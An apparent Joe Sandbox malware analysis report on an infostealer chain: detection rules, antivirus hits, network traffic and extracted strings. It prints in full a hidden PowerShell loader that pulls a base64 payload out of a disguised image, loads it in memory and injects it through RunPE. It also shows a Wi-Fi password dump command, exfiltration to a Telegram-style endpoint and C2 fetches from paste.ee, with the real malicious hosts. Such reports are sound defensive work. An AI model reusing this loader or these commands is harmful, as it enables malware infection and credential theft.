reaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

          Data Obfuscation

          barindex
          Sigma detected: Powershell download and load assembly
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base

          Stealing of Sensitive Information

          barindex
          Sigma detected: Capture Wi-Fi password
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 8168, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 1160, ProcessName: cmd.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://93.123.39.71/sword.txtAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: whatismyipaddressnow.coVirustotal: Detection: 6%Perma Link
          Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49710 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:54306 version: TLS 1.2
          Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 0169145Ch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 0169145Ch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443
          Connects to a pastebin service (likely for C&C)
          Source: unknownDNS query: name: paste.ee
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
          Source: global trafficHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: whatismyipaddressnow.co
          Source: unknownDNS query: name: whatismyipaddressnow.co
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficHTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49710 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
          Source: global trafficHTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
          Source: global trafficDNS traffic detected: DNS query: whatismyipaddressnow.co
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: 75.103.13.0.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: unknownHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive
          Source: cert9.db.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: cert9.db.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: cert9.db.9.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: cert9.db.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: cert9.db.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: cert9.db.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: cert9.db.9.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: cert9.db.9.drString found in binary or memory: http://ocsp.digicert.com0
          Source: cert9.db.9.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddressnow.co
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: cert9.db.9.drString found in binary or memory: http://x1.c.lencr.org/0
          Source: cert9.db.9.drString found in binary or memory: http://x1.i.lencr.org/0
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hT
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: tmp7752.tmp.dat.9.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZ
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/H
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/_
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411362998.00000260C4A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408211017.00000260C4A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY$
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY0
          Source: wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY4
          Source: wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasYz
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
